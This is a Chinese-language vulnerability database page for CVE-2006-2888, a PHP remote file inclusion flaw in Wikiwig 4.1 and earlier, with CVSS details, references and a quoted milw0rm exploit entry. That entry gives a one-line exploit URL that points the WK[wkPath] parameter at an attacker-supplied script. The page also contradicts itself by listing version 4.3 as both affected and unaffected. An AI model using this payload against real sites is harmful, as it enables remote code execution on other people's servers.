CVE-2006-2888
CVSS7.5
发布时间 :2006-06-07 06:02:00
修订时间 :2011-03-07 21:37:14
NMCOES    

[原文]PHP remote file inclusion vulnerability in _wk/wk_lang.php in Wikiwig 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the WK[wkPath] parameter.


[CNNVD]Wikiwig WK_lang.PHP 远程文件包含漏洞(CNNVD-200606-184)

        Wikiwig 4的_wk/wk_lang.php存在PHP远程文件包含漏洞,远程攻击者可借助WK[wkPath]参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:wikiwig:wikiwig:4.0
cpe:/a:wikiwig:wikiwig:4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2888
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2888
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-184
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2167
(UNKNOWN)  VUPEN  ADV-2006-2167
http://www.securityfocus.com/bid/18291
(UNKNOWN)  BID  18291
http://xforce.iss.net/xforce/xfdb/26942
(UNKNOWN)  XF  wikiwig-wklang-file-include(26942)
http://secunia.com/advisories/20487
(UNKNOWN)  SECUNIA  20487
http://milw0rm.com/exploits/1883
(UNKNOWN)  MILW0RM  1883

- 漏洞信息

Wikiwig WK_lang.PHP 远程文件包含漏洞
高危 输入验证
2006-06-07 00:00:00 2006-06-09 00:00:00
远程  
        Wikiwig 4的_wk/wk_lang.php存在PHP远程文件包含漏洞,远程攻击者可借助WK[wkPath]参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1883)

Wikiwig <= 4.1 (wk_lang.php) Remote File Include Vulnerability (EDBID:1883)
php webapps
2006-06-06 Verified
0 Kacper
N/A [点击下载]
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  Wikiwig <= V4.1 Remote File Include Vulnerability
$$  Script site: http://wikiwig.sourceforge.net/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[wikiwig-V4.1]/_wk/wk_lang.php?WK[wkPath]=[evil_scripts]


#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-06]
		

- 漏洞信息

26186
Wikiwig wk_lang.php WK[wkPath] Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-06 Unknow
2006-06-06 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Wikiwig WK_lang.PHP Remote File Include Vulnerability
Input Validation Error 18291
Yes No
2006-06-06 12:00:00 2008-05-29 05:53:00
Kacper is credited with the discovery of this vulnerability.

- 受影响的程序版本

Wikiwig Wikiwig 4.2
Wikiwig Wikiwig 4.1
Wikiwig Wikiwig 4.0
Wikiwig Wikiwig 4.3

- 不受影响的程序版本

Wikiwig Wikiwig 4.3

- 漏洞讨论

Wikiwig is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Versions prior to Wikiwig 4.3 are vulnerable.

- 漏洞利用

This issue can be exploited through a web client.

An example URI has been provided:

- 解决方案

The vendor has released an update. Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站